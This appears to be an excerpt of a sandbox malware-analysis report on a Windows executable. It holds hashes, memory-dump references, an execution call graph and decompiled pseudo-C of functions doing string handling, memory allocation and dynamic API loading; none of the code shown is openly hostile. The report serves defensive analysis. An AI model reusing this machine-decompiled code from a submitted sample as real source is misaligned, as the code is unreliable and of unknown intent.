                                                            0x0040618f
                                                            0x00406195
                                                            0x0040619f
                                                            0x00000000
                                                            0x00000000
                                                            0x0040619f
                                                            0x004061b2

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue
                                                            • String ID: Copy failed
                                                            • API String ID: 3356406503-2810831833
                                                            • Opcode ID: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction ID: 5cbf1d77a42ccbfbde14d2bcc727d6f9e9f9e3285794b8b30d10470a11d9e604
                                                            • Opcode Fuzzy Hash: 0e2aff98927a56fbb8766ba1e0bf3348b0e54a59a95deda98292fd61a1f7ac98
                                                            • Instruction Fuzzy Hash: 7501BC32500209ABDF22CF60CC09FDB3FA8EF44360F01803AF916A6192D378C964CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D4F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405D4F(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                            0x00405d5f
                                                            0x00405d61
                                                            0x00405d64
                                                            0x00405d90
                                                            0x00405d69
                                                            0x00405d72
                                                            0x00405d77
                                                            0x00405d82
                                                            0x00405d85
                                                            0x00405da1
                                                            0x00405d87
                                                            0x00405d8e
                                                            0x00000000
                                                            0x00405d8e
                                                            0x00405d9a
                                                            0x00405d9e
                                                            0x00405d9e
                                                            0x00405d98
                                                            0x00000000

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D77
                                                            • CharNextA.USER32(00000000), ref: 00405D88
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                            • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                            • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:4.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:245
                                                            Total number of Limit Nodes:6
                                                            execution_graph 1011 73bc2d6f 1012 73bc2d87 1011->1012 1013 73bc12d5 2 API calls 1012->1013 1014 73bc2da2 1013->1014 961 73bc2288 992 73bc12c6 GlobalAlloc 961->992 963 73bc22b4 993 73bc12c6 GlobalAlloc 963->993 965 73bc28f7 GlobalFree GlobalFree GlobalFree 966 73bc2917 965->966 981 73bc2965 965->981 967 73bc29b5 966->967 974 73bc2930 966->974 966->981 969 73bc29d6 GetModuleHandleA 967->969 967->981 968 73bc2814 GlobalAlloc 986 73bc22bf 968->986 972 73bc29fc 969->972 973 73bc29e7 LoadLibraryA 969->973 970 73bc2866 lstrcpyA 975 73bc2871 lstrcpyA 970->975 971 73bc2884 GlobalFree 971->986 1000 73bc1ece GetProcAddress 972->1000 973->972 973->981 978 73bc12af 2 API calls 974->978 974->981 975->986 977 73bc2a48 979 73bc2a56 lstrlenA 977->979 977->981 978->981 1001 73bc1ece GetProcAddress 979->1001 983 73bc2a09 983->977 991 73bc2a32 GetProcAddress 983->991 984 73bc2718 GlobalFree 984->986 985 73bc2a70 985->981 986->965 986->968 986->970 986->971 986->975 986->984 987 73bc28c2 986->987 988 73bc27b8 lstrcpyA 986->988 994 73bc12c6 GlobalAlloc 986->994 995 73bc12af 986->995 987->986 998 73bc12d5 GlobalSize GlobalAlloc 987->998 988->986 991->977 992->963 993->986 994->986 1002 73bc12c6 GlobalAlloc 995->1002 997 73bc12be lstrcpynA 997->986 999 73bc12f3 998->999 999->987 1000->983 1001->985 1002->997 1015 73bc103a 1016 73bc1052 1015->1016 1017 73bc10c4 1016->1017 1018 73bc1080 1016->1018 1019 73bc1060 1016->1019 1020 73bc1504 GlobalFree 1018->1020 1031 73bc1504 1019->1031 1026 73bc1078 1020->1026 1022 73bc1071 1024 73bc1504 GlobalFree 1022->1024 1023 73bc1090 GlobalSize 1025 73bc1099 1023->1025 1024->1026 1027 73bc109d GlobalAlloc 1025->1027 1028 73bc10ae 1025->1028 1026->1023 1026->1025 1035 73bc1558 wsprintfA 1027->1035 1030 73bc10b7 GlobalFree 1028->1030 1030->1017 1032 73bc150a 1031->1032 1033 73bc1510 1032->1033 1034 73bc151c GlobalFree 1032->1034 1033->1022 1034->1022 1038 73bc157e 1035->1038 1039 73bc1587 GlobalAlloc lstrcpynA 1038->1039 1040 73bc1579 1038->1040 1039->1040 1040->1028 1041 73bc1c2b 1042 73bc1c52 1041->1042 1043 73bc1c8f GlobalFree 1042->1043 1044 73bc1cad __alldvrm 1042->1044 1043->1044 1045 73bc157e 2 API calls 1044->1045 1046 73bc1d41 GlobalFree GlobalFree 1045->1046 1047 73bc1a24 1048 73bc1504 GlobalFree 1047->1048 1049 73bc1a3c 1048->1049 1050 73bc1a7e GlobalFree 1049->1050 1051 73bc1a5a 1049->1051 1052 73bc1a6a VirtualFree 1049->1052 1051->1050 1052->1050 1053 73bc2b24 1054 73bc2b8b 1053->1054 1055 73bc2b76 1053->1055 1055->1054 1056 73bc2b80 GetLastError 1055->1056 1056->1054 1057 73bc1606 1058 73bc1637 1057->1058 1096 73bc2288 1058->1096 1060 73bc163e 1061 73bc176f 1060->1061 1062 73bc1655 1060->1062 1127 73bc1edd 1060->1127 1131 73bc1f58 1062->1131 1065 73bc165c 1066 73bc168a 1065->1066 1067 73bc166b 1065->1067 1081 73bc1680 1065->1081 1066->1081 1150 73bc2e4f 1066->1150 1071 73bc1675 1067->1071 1075 73bc1682 1067->1075 1068 73bc16c0 1072 73bc16c6 1068->1072 1073 73bc1711 1068->1073 1069 73bc16a2 1153 73bc2128 1069->1153 1071->1081 1140 73bc2bc4 1071->1140 1169 73bc1e71 1072->1169 1079 73bc2128 11 API calls 1073->1079 1074 73bc16a8 1164 73bc15f4 1074->1164 1144 73bc1774 1075->1144 1084 73bc16fe 1079->1084 1081->1068 1081->1069 1087 73bc175e 1084->1087 1174 73bc1f1f 1084->1174 1086 73bc2128 11 API calls 1086->1084 1087->1061 1091 73bc1768 GlobalFree 1087->1091 1088 73bc157e 2 API calls 1090 73bc16b4 GlobalFree 1088->1090 1090->1084 1091->1061 1093 73bc174f 1093->1087 1095 73bc1558 3 API calls 1093->1095 1094 73bc1742 FreeLibrary 1094->1093 1095->1087 1178 73bc12c6 GlobalAlloc 1096->1178 1098 73bc22b4 1179 73bc12c6 GlobalAlloc 1098->1179 1100 73bc28f7 GlobalFree GlobalFree GlobalFree 1101 73bc2917 1100->1101 1116 73bc2965 1100->1116 1102 73bc29b5 1101->1102 1109 73bc2930 1101->1109 1101->1116 1104 73bc29d6 GetModuleHandleA 1102->1104 1102->1116 1103 73bc2814 GlobalAlloc 1121 73bc22bf 1103->1121 1107 73bc29fc 1104->1107 1108 73bc29e7 LoadLibraryA 1104->1108 1105 73bc2866 lstrcpyA 1110 73bc2871 lstrcpyA 1105->1110 1106 73bc2884 GlobalFree 1106->1121 1181 73bc1ece GetProcAddress 1107->1181 1108->1107 1108->1116 1113 73bc12af 2 API calls 1109->1113 1109->1116 1110->1121 1112 73bc2a48 1114 73bc2a56 lstrlenA 1112->1114 1112->1116 1113->1116 1182 73bc1ece GetProcAddress 1114->1182 1116->1060 1118 73bc2a09 1118->1112 1126 73bc2a32 GetProcAddress 1118->1126 1119 73bc2718 GlobalFree 1119->1121 1120 73bc2a70 1120->1116 1121->1100 1121->1103 1121->1105 1121->1106 1121->1110 1121->1119 1122 73bc28c2 1121->1122 1123 73bc27b8 lstrcpyA 1121->1123 1124 73bc12af 2 API calls 1121->1124 1180 73bc12c6 GlobalAlloc 1121->1180 1122->1121 1125 73bc12d5 2 API calls 1122->1125 1123->1121 1124->1121 1125->1122 1126->1112 1128 73bc1ef0 1127->1128 1129 73bc1efb GlobalAlloc 1128->1129 1130 73bc1f1c 1128->1130 1129->1128 1130->1062 1132 73bc1f6d 1131->1132 1134 73bc20dc GlobalFree 1132->1134 1136 73bc2038 GlobalAlloc MultiByteToWideChar 1132->1136 1137 73bc12af lstrcpynA GlobalAlloc 1132->1137 1183 73bc14e2 1132->1183 1188 73bc1958 1132->1188 1134->1132 1135 73bc2100 1134->1135 1135->1065 1136->1132 1138 73bc2067 GlobalAlloc CLSIDFromString GlobalFree 1136->1138 1137->1132 1138->1134 1141 73bc2bd6 1140->1141 1191 73bc2b72 1141->1191 1148 73bc17a0 1144->1148 1145 73bc1814 GlobalAlloc 1149 73bc1832 1145->1149 1146 73bc1825 1147 73bc1829 GlobalSize 1146->1147 1146->1149 1147->1149 1148->1145 1148->1146 1149->1081 1151 73bc2e5a 1150->1151 1152 73bc2e9a GlobalFree 1151->1152 1194 73bc12c6 GlobalAlloc 1153->1194 1155 73bc219f lstrcpynA 1159 73bc2136 1155->1159 1156 73bc21d8 WideCharToMultiByte 1156->1159 1157 73bc21b0 StringFromGUID2 WideCharToMultiByte 1157->1159 1158 73bc2225 GlobalFree 1158->1159 1159->1155 1159->1156 1159->1157 1159->1158 1160 73bc2202 wsprintfA 1159->1160 1161 73bc225c GlobalFree 1159->1161 1162 73bc157e 2 API calls 1159->1162 1195 73bc15c7 1159->1195 1160->1159 1161->1074 1162->1159 1199 73bc12c6 GlobalAlloc 1164->1199 1166 73bc15f9 1167 73bc1e71 2 API calls 1166->1167 1168 73bc1603 1167->1168 1168->1088 1170 73bc1e7e wsprintfA 1169->1170 1171 73bc1eaf lstrcpyA 1169->1171 1173 73bc16e5 1170->1173 1171->1173 1173->1086 1175 73bc1f2e 1174->1175 1176 73bc1724 1174->1176 1175->1176 1177 73bc1f42 GlobalFree 1175->1177 1176->1093 1176->1094 1177->1175 1178->1098 1179->1121 1180->1121 1181->1118 1182->1120 1184 73bc14ef 1183->1184 1185 73bc12c6 GlobalAlloc 1183->1185 1186 73bc12af 2 API calls 1184->1186 1185->1132 1187 73bc1502 1186->1187 1187->1132 1189 73bc19c5 1188->1189 1190 73bc1967 VirtualAlloc 1188->1190 1189->1132 1190->1189 1192 73bc2b8b 1191->1192 1193 73bc2b80 GetLastError 1191->1193 1192->1081 1193->1192 1194->1159 1196 73bc15ce 1195->1196 1197 73bc15ef 1195->1197 1196->1197 1198 73bc15d7 lstrcpyA 1196->1198 1197->1159 1198->1197 1199->1166 1200 73bc10c6 1207 73bc10f7 1200->1207 1201 73bc12a7 GlobalFree 1202 73bc11d5 GlobalAlloc 1202->1207 1203 73bc1245 GlobalFree 1203->1207 1204 73bc14e2 3 API calls 1204->1207 1205 73bc12a3 1205->1201 1206 73bc1286 GlobalFree 1206->1207 1207->1201 1207->1202 1207->1203 1207->1204 1207->1205 1207->1206 1208 73bc157e 2 API calls 1207->1208 1209 73bc15c7 lstrcpyA 1207->1209 1211 73bc115d GlobalAlloc 1207->1211 1210 73bc11ca GlobalFree 1208->1210 1212 73bc11ad GlobalFree 1209->1212 1210->1207 1211->1207 1212->1207 1003 73bc19c7 1004 73bc1a1e 1003->1004 1005 73bc19d7 VirtualProtect 1003->1005 1005->1004 1213 73bc1a87 1214 73bc1ab5 1213->1214 1215 73bc2288 18 API calls 1214->1215 1216 73bc1abc 1215->1216 1217 73bc1acf 1216->1217 1218 73bc1ac3 1216->1218 1220 73bc1ad9 1217->1220 1221 73bc1af0 1217->1221 1219 73bc157e 2 API calls 1218->1219 1222 73bc1acd 1219->1222 1223 73bc1558 3 API calls 1220->1223 1224 73bc1b1c 1221->1224 1225 73bc1af6 1221->1225 1227 73bc1ade 1223->1227 1226 73bc1558 3 API calls 1224->1226 1228 73bc15f4 3 API calls 1225->1228 1226->1222 1230 73bc15f4 3 API calls 1227->1230 1229 73bc1afb 1228->1229 1231 73bc157e 2 API calls 1229->1231 1232 73bc1ae4 1230->1232 1233 73bc1b01 GlobalFree 1231->1233 1234 73bc157e 2 API calls 1232->1234 1233->1222 1235 73bc1aea GlobalFree 1233->1235 1234->1235 1237 73bc1000 1240 73bc101b 1237->1240 1241 73bc1504 GlobalFree 1240->1241 1242 73bc1020 1241->1242 1243 73bc1024 GlobalAlloc 1242->1243 1244 73bc1032 1242->1244 1243->1244 1245 73bc1558 3 API calls 1244->1245 1246 73bc1019 1245->1246 1006 73bc14e2 1007 73bc14ef 1006->1007 1008 73bc12c6 GlobalAlloc 1006->1008 1009 73bc12af 2 API calls 1007->1009 1010 73bc1502 1009->1010

                                                            Callgraph

                                                            • Executed
                                                            • Not Executed
                                                            • Opacity -> Relevance
                                                            • Disassembly available
                                                            callgraph 0 Function_73BC1B3E 1 Function_73BC1BBE 2 Function_73BC1BB8 3 Function_73BC1B38 4 Function_73BC2BB8 5 Function_73BC103A 13 Function_73BC152B 5->13 18 Function_73BC1326 5->18 27 Function_73BC1504 5->27 33 Function_73BC12FA 5->33 43 Function_73BC1558 5->43 6 Function_73BC30B0 7 Function_73BC2FB0 8 Function_73BC1BAD 9 Function_73BC12AF 56 Function_73BC12C6 9->56 10 Function_73BC2128 32 Function_73BC157E 10->32 50 Function_73BC144D 10->50 10->56 59 Function_73BC15C7 10->59 11 Function_73BC2BA9 12 Function_73BC1B2A 14 Function_73BC1C2B 14->6 14->7 14->13 14->18 25 Function_73BC3090 14->25 14->32 40 Function_73BC30E0 14->40 47 Function_73BC2ED0 14->47 14->50 15 Function_73BC1B24 16 Function_73BC1A24 16->27 17 Function_73BC2B24 18->18 18->47 19 Function_73BC1C27 20 Function_73BC1BA7 21 Function_73BC1C23 22 Function_73BC1F1F 23 Function_73BC101B 23->27 23->43 24 Function_73BC2F10 26 Function_73BC2288 26->9 26->13 26->18 46 Function_73BC12D5 26->46 48 Function_73BC1B4C 26->48 26->50 51 Function_73BC1ECE 26->51 26->56 27->13 27->18 28 Function_73BC1606 28->10 28->22 28->26 28->32 34 Function_73BC15F4 28->34 35 Function_73BC1774 28->35 37 Function_73BC1E71 28->37 42 Function_73BC1EDD 28->42 28->43 45 Function_73BC1F58 28->45 52 Function_73BC2E4F 28->52 55 Function_73BC2BC4 28->55 29 Function_73BC1A87 29->26 29->32 29->34 29->43 30 Function_73BC1000 30->23 31 Function_73BC3100 34->37 34->56 35->33 49 Function_73BC1BCC 35->49 36 Function_73BC12F7 38 Function_73BC2B72 39 Function_73BC2D6F 39->2 39->3 39->4 39->8 39->11 39->15 39->19 39->21 39->46 53 Function_73BC1BC8 39->53 54 Function_73BC1BC4 39->54 41 Function_73BC14E2 41->9 43->32 44 Function_73BC1958 45->9 45->13 45->18 45->41 45->44 45->50 46->33 48->18 50->24 52->2 52->12 52->15 52->19 52->21 55->0 55->1 55->2 55->3 55->8 55->12 55->19 55->20 55->21 55->31 55->38 55->53 55->54 57 Function_73BC10C6 57->13 57->32 57->33 57->41 57->59 58 Function_73BC19C7

                                                            Executed Functions

                                                            Function 73BC2288 Relevance: 25.2, APIs: 13, Strings: 1, Instructions: 667stringlibrarymemoryCOMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E73BC2288() {
				CHAR* _t236;
				void* _t238;
				signed int _t239;
				char _t240;
				char _t241;
				void _t242;
				CHAR* _t243;
				void* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				int _t252;
				CHAR* _t253;
				signed short _t255;
				CHAR* _t259;
				void* _t260;
				CHAR** _t261;
				intOrPtr _t264;
				void* _t272;
				signed int _t273;
				CHAR* _t274;
				CHAR* _t276;
				CHAR* _t279;
				void* _t281;
				CHAR* _t282;
				void _t283;
				signed int _t287;
				void* _t288;
				void* _t291;
				CHAR* _t298;
				signed int _t299;
				CHAR* _t303;
				CHAR* _t305;
				CHAR* _t306;
				CHAR* _t307;
				CHAR* _t312;
				CHAR* _t313;
				char _t319;
				CHAR* _t320;
				char _t323;
				signed int _t333;
				void* _t335;
				CHAR* _t336;
				CHAR* _t337;
				void _t338;
				CHAR* _t341;
				CHAR* _t343;
				signed int _t345;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				signed int _t355;
				CHAR* _t360;
				void* _t361;
				signed int _t368;
				signed int _t369;
				CHAR* _t370;
				void* _t371;
				CHAR* _t377;
				signed int _t379;
				CHAR* _t380;
				void* _t382;
				void* _t383;
				CHAR* _t384;
				CHAR* _t385;
				CHAR* _t386;
				CHAR* _t387;
				struct HINSTANCE__* _t388;
				CHAR* _t390;
				void* _t391;
				void* _t392;

				 *(_t392 + 0x1c) = 0;
				_t382 = 0;
				 *(_t392 + 0x34) = 0;
				 *(_t392 + 0x30) = 0;
				 *(_t392 + 0x18) = 0;
				 *(_t392 + 0x2c) = 0;
				 *(_t392 + 0x3c) = 0;
				 *(_t392 + 0x28) = 0;
				_t236 = E73BC12C6();
				 *(_t392 + 0x14) = _t236;
				_t312 = _t236;
				 *(_t392 + 0x38) = E73BC12C6();
				_t238 = E73BC152B();
				_t391 = _t238;
				 *(_t392 + 0x44) = _t238;
				_t383 = _t238;
				 *(_t392 + 0x24) = _t391;
				 *((intOrPtr*)(_t392 + 0x48)) = 2;
				_t239 = 0;
				while(1) {
					_t368 = _t239;
					 *(_t392 + 0x40) = _t368;
					if(_t239 != 0 && _t382 == 0) {
						break;
					}
					_t240 =  *_t391;
					 *((char*)(_t392 + 0x13)) = _t240;
					_t241 = _t240;
					_t319 = _t241;
					if(_t319 == 0) {
						_t169 = _t392 + 0x1c;
						 *_t169 =  *(_t392 + 0x1c) | 0xffffffff;
						__eflags =  *_t169;
						L132:
						_t369 = _t368;
						if(_t369 == 0) {
							_t370 = 0;
							 *_t312 = 0;
							__eflags = _t382;
							if(_t382 == 0) {
								_t281 = GlobalAlloc(0x40, 0x14a4); // executed
								_t382 = _t281;
								_t370 = 0;
								__eflags = 0;
								 *(_t382 + 0x810) = 0;
								 *(_t382 + 0x814) = 0;
							}
							_t242 =  *(_t392 + 0x34);
							_t177 = _t382 + 8; // 0x8
							_t320 = _t177;
							_t178 = _t382 + 0x408; // 0x408
							_t384 = _t178;
							 *_t382 = _t242;
							 *_t320 = _t370;
							 *_t384 = _t370;
							 *(_t382 + 0x808) = _t370;
							 *(_t382 + 0x80c) = _t370;
							 *(_t382 + 4) = _t370;
							_t243 = _t242 - _t370;
							__eflags = _t243;
							if(_t243 == 0) {
								__eflags = _t312 -  *(_t392 + 0x14);
								if(_t312 ==  *(_t392 + 0x14)) {
									goto L154;
								}
								_t390 = _t370;
								GlobalFree(_t382);
								_push( *(_t392 + 0x14));
								_t382 = E73BC1326();
								__eflags = _t382;
								if(_t382 == 0) {
									goto L154;
								} else {
									goto L147;
								}
								while(1) {
									L147:
									_t272 =  *(_t382 + 0x14a0);
									__eflags = _t272;
									if(_t272 == 0) {
										break;
									}
									_t390 = _t382;
									_t382 = _t272;
								}
								__eflags = _t390;
								if(_t390 != 0) {
									_t187 =  &(_t390[0x14a0]);
									 *_t187 = _t390[0x14a0] & 0x00000000;
									__eflags =  *_t187;
								}
								_t273 =  *(_t382 + 0x810);
								__eflags = _t273 & 0x00000008;
								if((_t273 & 0x00000008) == 0) {
									_t333 = 2;
									_t274 = _t273 | _t333;
									__eflags = _t274;
									 *(_t382 + 0x810) = _t274;
								} else {
									_t382 = E73BC12D5(_t382);
									 *(_t382 + 0x810) =  *(_t382 + 0x810) & 0xfffffff5;
								}
								goto L154;
							} else {
								_t276 = _t243 - 1;
								__eflags = _t276;
								if(_t276 == 0) {
									L143:
									lstrcpyA(_t320,  *(_t392 + 0x38));
									L144:
									lstrcpyA(_t384,  *(_t392 + 0x14));
									L154:
									_t312 =  *(_t392 + 0x14);
									L155:
									_t239 =  *(_t392 + 0x1c);
									_t391 = _t391 + 1;
									 *(_t392 + 0x24) = _t391;
									_t383 = _t391;
									if(_t239 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t279 = _t276 - 1;
								__eflags = _t279;
								if(_t279 == 0) {
									goto L144;
								}
								__eflags = _t279 != 1;
								if(_t279 != 1) {
									goto L154;
								}
								goto L143;
							}
						}
						_t371 = _t369 - 1;
						if(_t371 == 0) {
							_t282 =  *(_t392 + 0x30);
							if( *(_t392 + 0x2c) == _t371) {
								_t282 = _t282 - 1;
							}
							 *(_t382 + 0x814) = _t282;
						}
						goto L154;
					}
					_t335 = _t319 - 0x23;
					if(_t335 == 0) {
						_t336 =  *(_t392 + 0x1c);
						__eflags = _t383 -  *(_t392 + 0x44);
						if(_t383 <=  *(_t392 + 0x44)) {
							L29:
							__eflags =  *(_t392 + 0x28);
							if( *(_t392 + 0x28) != 0) {
								L15:
								_t337 = _t336;
								__eflags = _t337;
								if(_t337 == 0) {
									_t283 =  *((intOrPtr*)(_t392 + 0x13));
									while(1) {
										__eflags = _t283 - 0x22;
										if(_t283 != 0x22) {
											break;
										}
										_t391 = _t391 + 1;
										__eflags =  *(_t392 + 0x28);
										_t383 = _t391;
										if( *(_t392 + 0x28) == 0) {
											__eflags = 1;
											 *(_t392 + 0x28) = 1;
											L121:
											 *_t312 =  *_t391;
											_t312 =  &(_t312[1]);
											goto L155;
										}
										_t157 = _t392 + 0x28;
										 *_t157 =  *(_t392 + 0x28) & 0x00000000;
										__eflags =  *_t157;
										_t283 =  *_t391;
									}
									__eflags = _t283 - 0x2a;
									if(_t283 == 0x2a) {
										_t287 = 2;
										 *(_t392 + 0x34) = _t287;
										L129:
										_t385 =  *(_t392 + 0x14);
										L130:
										_t312 = _t385;
										goto L155;
									}
									__eflags = _t283 - 0x2d;
									if(_t283 == 0x2d) {
										L117:
										_t338 =  *_t391;
										__eflags = _t338 - 0x2d;
										if(_t338 != 0x2d) {
											L122:
											_t162 = _t391 + 1; // 0x1
											_t288 = _t162;
											__eflags =  *_t288 - 0x3a;
											if( *_t288 != 0x3a) {
												goto L121;
											}
											__eflags = _t338 - 0x2d;
											if(_t338 == 0x2d) {
												goto L121;
											}
											__eflags = 1;
											 *(_t392 + 0x34) = 1;
											L125:
											_t385 =  *(_t392 + 0x14);
											_t391 = _t288;
											__eflags = _t312 - _t385;
											if(_t312 <= _t385) {
												 *( *(_t392 + 0x38)) = 0;
											} else {
												 *_t312 = 0;
												lstrcpyA( *(_t392 + 0x3c), _t385);
											}
											goto L130;
										}
										_t159 = _t383 + 1; // 0x1
										_t288 = _t159;
										__eflags =  *_t288 - 0x3e;
										if( *_t288 != 0x3e) {
											goto L122;
										}
										 *(_t392 + 0x34) = 3;
										goto L125;
									}
									__eflags = _t283 - 0x3a;
									if(_t283 != 0x3a) {
										goto L121;
									}
									goto L117;
								}
								_t341 = _t337 - 1;
								__eflags = _t341;
								if(_t341 == 0) {
									_t313 =  *(_t392 + 0x30);
									L49:
									_t291 = _t241 + 0xffffffde;
									__eflags = _t291 - 0x55;
									if(_t291 > 0x55) {
										goto L129;
									}
									_t76 = _t291 + 0x73bc2b1c; // 0x73bc402c
									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M73BC2A94))) {
										case 0:
											__esi =  *(__esp + 0x14);
											__ecx =  *(__esp + 0x14);
											__dl =  *((intOrPtr*)(__esp + 0x13));
											while(1) {
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												L86:
												__eflags =  *(__ebp + 1) - __dl;
												if( *(__ebp + 1) != __dl) {
													L91:
													 *__ecx = 0;
													__esi = E73BC12AF(__esi);
													goto L92;
												}
												L87:
												__eflags = __al;
												if(__al == 0) {
													goto L91;
												}
												__eflags = __al - __dl;
												if(__al == __dl) {
													__ebp = __ebp + 1;
													__eflags = __ebp;
												}
												__al =  *__ebp;
												 *__ecx =  *__ebp;
												__ecx = __ecx + 1;
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												goto L86;
											}
										case 1:
											L46:
											 *(_t392 + 0x18) = 1;
											goto L129;
										case 2:
											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
											goto L129;
										case 3:
											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
											__eax = 0;
											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
											__ebx = __ebx + 1;
											__eax = 1;
											 *(__esp + 0x30) = __ebx;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											goto L129;
										case 4:
											__eflags =  *(__esp + 0x20);
											if( *(__esp + 0x20) != 0) {
												goto L129;
											}
											 *(__esp + 0x24) = __ebp;
